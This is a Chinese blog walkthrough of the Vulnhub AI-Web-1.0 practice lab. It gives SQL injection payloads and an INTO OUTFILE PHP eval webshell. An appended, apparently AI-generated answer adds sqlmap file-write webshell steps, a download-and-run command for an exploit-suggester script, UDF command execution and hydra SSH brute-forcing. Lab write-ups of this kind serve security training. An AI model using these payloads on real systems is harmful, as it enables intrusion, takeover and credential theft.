Ai-web 1.0靶场通关攻略

最新推荐文章于 2025-07-20 16:20:25 发布
原创 最新推荐文章于 2025-07-20 16:20:25 发布 · 672 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

1.环境

虚拟机:kali

靶机:ai-web-1.0

2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径

用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径

用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入

输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名

使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数

' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位

' union select 1,2,3#

然后获取数据库名称

' union select 1,database(),3#

该数据库名称为 aiweb1

之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。

6.一句话木马上传文件

由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。

-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#

上传成功后路径打开2.php蚁剑连接成功我的找不到路径

cjchsh
关注
记录一次vulnhub:AI-WEB-1.0靶场复现
sszsNo1的博客
06-24 408
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
Vulnhub-AI-Web1.0靶场通关攻略
qq_65852138的博客
04-01 756
【代码】Vulnhub-AI-Web1.0靶场通关攻略
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1737
AIweb2靶场渗透测试
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 869
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
Vulnhub靶场--AI-Web-1.0提权获取flag
qq_53830529的博客
05-16 1182
vulnhub实战靶场中的AI-Web-1.0,使用两种SQL注入上传shell的方法,第一:SQLmap的--os-shell上传shell,第二:通过手动into outfile上传webshell。
AI-web1.0 靶机 通关攻略
qq_65379983的博客
03-03 773
ai-web 1.0
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6938
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
HCIP-AI-Ascend Developer V1.0视频.zip
04-16
1.2.1 昇腾AI处理器架构(11.2 昇腾AI处理器架构 1.2.2 昇腾AI处理器架构(2) 1.2 昇腾AI处理器架构 1.3.1 openGauss技术指标 1.3 openGauss技术指标 1.3.1 昇腾AI计算平台CANN 1.3 昇腾AI计算平台CANN ...
Orin-TRM-DP10508002-v1.0p.pdf
05-13
NVIDIA Orin系列系统级芯片(SoC)技术参考手册DP-10508-002-v1.0p详细介绍了该芯片内部的硬件模块。本手册旨在提供功能描述以及许多模块的硬件编程接口。然而,对于如视频和图形硬件加速等部分,由于是由NVIDIA提供...
[检测统计]X-Prober 1.0 linux系统探针_x-prober 1.0.rar
04-03
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
AIweb1靶场总结
胖虎的博客
11-03 623
aiweb1靶场总结
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 4495
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI WEB靶场
weixin_53198216的博客
07-29 301
再输入路径/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/7.打开sqlmap 输入python sqlmap.py -r 1.txt --os-shell。8.选择[4]php后再选择[2]custom location。3.进入这个目录/se3reTdir777/uploads/5.进行抓包,将得到的数据包复制出来保存成一个txt文件。6.在uid前加一个*后保存文件。2.根据扫描到的端口进入地址。4.判断是否存在sql注入。
AI-web1靶机通关教程
m0_75169999的博客
07-20 1067
AI-WEB1靶机攻击教程
AI WEB靶场(通关攻略)
m0_68706634的博客
12-04 635
进行 sql 注入漏洞探测时语法-u的域名是需要带参数的,但post传参时url框中没有参数,这时使用bp抓包(抓post传参时的参数),方便之后查询。然后继续尝试在绝对路径后加入之前得到的两个目录/m3diNf0/,/se3reTdir777/uploads/可以看到目录下并无任何文件,这时我们可以试着访问它的上级目录/se3reTdir777/可以得到两个目录为/m3diNf0/,/se3reTdir777/uploads/可以看到/m3diNf0/目录也没有权限,再试试另外一个。
AI-Web靶场通关攻略
Nai_zui_jiang的博客
08-19 373
使用dirb对/m3diNf0/目录进行扫描 会找到一个info.php文件 我们在网站上打开,得到网站的绝对路径。使用抓包工具进行抓包,并在uid=1后面加上 * 然后复制到一个txt文件里面,这里我的是创建的1.txt文件。尝试--os-shell 这里需要绝对路径,我们之前已经找到绝对路径所以可以直接尝试连接--os-shell。继续使用dirb对/se3reTdir777目录进行扫描,找到一个index.php文件,访问。我们可以选择在本机也就是物理机上下载sqlmap,然后再进行注入。
打靶归来!盛派 AI 提示词靶场初体验
盛派开发者社区
08-27 1007
当然,盛派提示词靶场的功能还有很多,例如参数模型中有很多的参数可以进行模型请求参数调整,我们还可以用更加丰富的提示词来验证我们的需求。可能我们在对话的前几次所的用提示词,所得到的大模型答复,要比这次最新的要更好。正如软件工程要不断迭代,通过不断的“小步快跑”,从而不断完善我们的提示词工程,最终命中靶心!所以我们为了解决这个问题,为了我们能向我们所期望的目标不断进发,不断的完善和优化提示词,以便于我们命中。“如果大家用过一段时间大模型和提示词后,我们会发现,我们和大模型对话时,使用的提示词,一定不是。
aiweb1.0靶场通关攻略
2401_88387979的博客
12-04 747
虚拟机:kali靶机:ai-web-1.0
鹏城AI靶场助力大规模高质量中文语料数据集安全开放
OpenI启智社区
09-02 633
鹏城实验室率先开放大规模高质量中文语料数据集,研究人员可在鹏城AI靶场上安全使用数据
AI Web 1.0靶场 sqlimap提权
最新发布
10-16
<think>我们正在处理的是一个关于在AI Web 1.0靶场中使用SQLMap进行提权的查询。请注意,SQLMap是一个自动化的SQL注入工具,通常用于检测和利用SQL注入漏洞。然而,提权(Privilege Escalation)通常指的是在已经获得某种访问权限后提升权限的过程(例如从普通用户提升到管理员)。在SQL注入的上下文中,如果数据库用户具有高权限(如数据库管理员),我们可能通过执行系统命令或读写文件来获取系统权限,但这通常需要数据库配置允许(例如在MySQL中,secure_file_priv设置,以及数据库用户有FILE权限等)。 由于这是一个靶场环境,我们可以假设存在SQL注入漏洞,并且我们希望通过SQL注入来获取系统权限(即提权)。以下是一个典型的步骤: 1. **发现并确认SQL注入点**:首先需要使用SQLMap或其他方法确认存在SQL注入漏洞。 2. **获取数据库信息**:利用SQLMap获取数据库类型、版本、当前用户等信息,以判断是否有高权限。 3. **尝试获取操作系统访问权限**:如果数据库用户有足够的权限(例如在MySQL中是root用户且数据库配置允许),可以尝试通过SQLMap上传一个Web shell,或者利用数据库的功能执行系统命令。 具体到AI Web 1.0靶场,由于我们不知道具体的环境配置,但假设它模拟了一个典型的Web应用,以下是一般步骤: ### 步骤1: 使用SQLMap检测注入 运行SQLMap来检测目标URL是否存在注入: ```bash sqlmap -u "http://target.com/page.php?id=1" --batch ``` ### 步骤2: 获取当前用户和权限 如果存在注入,查看当前数据库用户和权限: ```bash sqlmap -u "http://target.com/page.php?id=1" --current-user --privileges --batch ``` 如果当前用户具有高权限(例如在MySQL中,用户有`FILE`权限),则可以尝试读取或写入文件。 ### 步骤3: 尝试写入Web Shell 如果数据库用户有写权限,并且知道Web目录的绝对路径,可以尝试写入一个Web shell: ```bash sqlmap -u "http://target.com/page.php?id=1" --file-write="/path/to/shell.php" --file-dest="/var/www/html/shell.php" ``` 其中,`/path/to/shell.php`是你本地的一个简单的PHP Web shell(例如:`<?php system($_GET['cmd']);?>`),而`/var/www/html/shell.php`是目标服务器上的Web目录。 ### 步骤4: 通过Web Shell执行命令 成功写入Web shell后,访问`http://target.com/shell.php?cmd=id`,即可执行系统命令。 ### 步骤5: 提权 获得系统命令执行能力后,你可能还需要进行系统提权(例如利用系统内核漏洞)。这通常涉及上传提权利用代码并执行。可以使用以下方法: - 使用Web shell上传提权利用程序(如脏牛漏洞利用代码)并编译执行。 - 或者,如果目标系统有安装编译工具,可以直接在Web shell中编译并运行。 ### 注意事项 1. 在真实环境中,未经授权的测试是非法的。以上步骤仅适用于授权测试或靶场环境。 2. 写入文件需要知道Web目录的绝对路径,这在靶场中可能通过其他方式泄露(如错误信息)或猜测得到。 3. 数据库配置可能阻止文件写入(如MySQL的`secure_file_priv`设置),所以写入可能失败。 由于AI Web 1.0靶场具体环境未知,以上是一般方法。如果靶场有特殊设计,可能需要调整策略。 ### 相关问题 1. SQLMap在什么情况下无法成功写入文件? 2. 如何在MySQL中查看`secure_file_priv`的值? 3. 除了写入Web shell,还有哪些方法可以通过SQL注入获取系统权限? 4. 系统提权有哪些常用方法? </think>在AI Web 1.0靶场中使用SQLMap进行提权操作,需要结合SQL注入漏洞利用和系统提权技术。以下是详细操作流程(仅限授权测试环境): ### 一、SQL注入漏洞利用 1. **识别注入点**:使用SQLMap扫描目标URL ```bash sqlmap -u "http://target.com/vuln_page?id=1" --risk=3 --level=5 ``` 2. **获取数据库信息**: ```bash sqlmap -u "http://target.com/vuln_page?id=1" --banner --current-user --dbs ``` 3. **尝试文件读写**(需数据库高权限): ```bash # 检查文件读写权限 sqlmap -u "http://target.com/vuln_page?id=1" --file-read=/etc/passwd # 写入Webshell(需已知绝对路径) sqlmap -u "http://target.com/vuln_page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php ``` ### 二、系统提权操作 1. **通过Webshell执行命令**: ```php <?php system($_GET['cmd']); ?> # 基础Webshell代码 ``` 访问:`http://target.com/shell.php?cmd=id` 2. **查找SUID提权机会**: ```bash find / -perm -4000 2>/dev/null ``` 3. **内核漏洞提权**: ```bash # 上传Linux提权检测工具 wget https://github.com/mzet-/linux-exploit-suggester/raw/master/linux-exploit-suggester.sh -O les.sh # 执行检测 sh les.sh ``` ### 三、AI Web 1.0靶场特殊技巧 1. **数据库提权路径**: - MySQL UDF提权:尝试编译恶意共享库 ```sql CREATE FUNCTION sys_exec RETURNS integer SONAME 'udf.so'; ``` - PostgreSQL命令执行:利用`COPY FROM PROGRAM` 2. **密码复用攻击**: ```bash # 从数据库提取密码哈希 sqlmap -u "http://target.com/vuln_page?id=1" --passwords # 尝试SSH登录 hydra -L users.txt -P pass.txt ssh://target ``` ### 注意事项 1. 操作前确认授权状态 2. MySQL secure_file_priv设置可能限制文件读写 3. Web目录权限影响Webshell写入成功率 4. 建议配合Metasploit框架使用[^1] [^1]: 参考OWASP SQL注入防护指南和PentesterLab靶场文档
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值